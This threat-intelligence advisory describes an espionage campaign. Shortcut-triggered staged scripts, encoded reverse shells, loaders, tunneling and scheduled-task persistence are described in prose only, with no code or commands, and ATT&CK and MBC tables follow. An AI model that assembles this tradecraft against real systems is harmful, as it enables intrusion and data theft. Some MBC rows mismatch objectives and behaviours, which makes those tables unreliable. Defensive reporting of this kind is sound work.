EXECUTIVE SUMMARY:
This advisory describes a targeted espionage campaign that begins with carefully themed compressed attachments delivered to selected recipients. The archive contains a shortcut that, when opened, triggers the system scripting interpreter to retrieve and execute a small, staged script hosted on an externally accessible code repository. That staged script carries an encoded payload which decodes to a compact reverse shell implemented as a script; the reverse shell establishes an outbound session that reads operator-supplied text commands, executes them locally, and returns results to the remote controller. Operators also use small native binaries behaving as loaders or implants to spawn interpreter processes and forward input/output streams to a remote controller. A lightweight tunneling component is used in some waves to forward traffic and increase operator flexibility. The primary affected systems are user workstations running a common desktop operating system and standard scripting/command interpreters. The business impact is intelligence loss and sustained unauthorized access: diplomatic communications, transport and communications project details, and resource-sector planning documents are at risk of exposure.
The technical chain is compact and modular: a compressed archive delivers a shortcut that abuses native shortcut handling to invoke the system interpreter and download a staged script from a publicly available repository. The staged script decodes a base64-encoded blob that implements a small persistent read–execute loop: it reads textual commands, evaluates them via the local interpreter, converts results to strings, and sends output back to the operator. In parallel, native loader binaries are used to invoke the same scripted stager via a process-creation API, supporting both embedded blobs and staged downloads; this loader→stager→implant pattern recurs across observed waves. Native implants compiled in a systems language act as TCP/TLS reverse shells: they accept control arguments, connect to a control endpoint, create child processes via standard process APIs, and forward I/O streams; some variants perform simple XOR decoding of embedded strings and use named pipes for local I/O. Operators also leverage an open-source tunneling tool to proxy or forward operator traffic. In at least one wave, a helper script pair writes files to a user temporary folder and creates a scheduled job that runs frequently and immediately on creation, achieving lightweight persistence.
Observed activity represents a focused intelligence-collection operation that combines straightforward social engineering with modular, low-footprint tooling to obtain and maintain interactive access. The adversary consistently reuses a small set of reliable components—shortcut-triggered staged scripts, encoded script blobs, modular loaders, and compact native reverse shells—producing a recognizable operational pattern across different target themes. Use of public hosting for staged scripts and an open source tunneling utility reduces infrastructure cost while leaving discoverable pivot points in shortcut metadata and staged artefacts. Technically, the campaign prioritizes stable command-and-control and operator flexibility rather than elaborate obfuscation or deep persistence; when persistence is used it is implemented with frequently scheduled jobs and lightweight helpers rather than invasive system changes. Strategically, the activity aligns with espionage objectives: selective targeting of diplomatic and infrastructure-related organizations, emphasis on information collection, and quick deployable toolchains.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub Technique Name |
| Resource Development | T1588.002 | Obtain Capabilities | Tool |
| T1583.001 | Acquire Infrastructure | Domains | |
| T1587.001 | Develop Capabilities | Malware | |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1204.002 | User Execution | Malicious File |
| T1059.005 | Command and Scripting Interpreter | Visual Basic | |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1027.010 | Obfuscated Files or Information | Command Obfuscation |
| T1036.005 | Masquerading | Match Legitimate Name or Location | |
| Discovery | T1082 | System Information Discovery | - |
| T1083 | File and Directory Discovery | - | |
| T1016 | System Network Configuration Discovery | - | |
| Collection | T1005 | Data from Local System | - |
| T1113 | Screen Capture | - | |
| T1115 | Clipboard Data | - | |
| T1560.001 | Archive Collected Data | Archive via Utility | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1090.001 | Proxy | Internal Proxy | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Initial Access | E1204 | User Execution |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys |
| F0013 | Scheduled Tasks | |
| Defense Evasion | E1027 | Obfuscated Files/Information |
| B0003 | Dynamic Analysis Evasion | |
| F0015 | Hijack Execution Flow | |
| Discovery | E1082 | System Information Discovery |
| Credential Access | E1055 | Process Injection |
| Collection | E1083 | File/Directory Discovery |
| E1113 | Screen Capture | |
| E1510 | Clipboard Modification | |
| Lateral Movement | E1105 | Ingress Tool Transfer |
| Command & Control | B0031 | Domain Name Generation |
| C0002 | HTTP Communication | |
| Exfiltration | E1020 | Automated Exfiltration |
REFERENCES:
The following reports contain further technical details: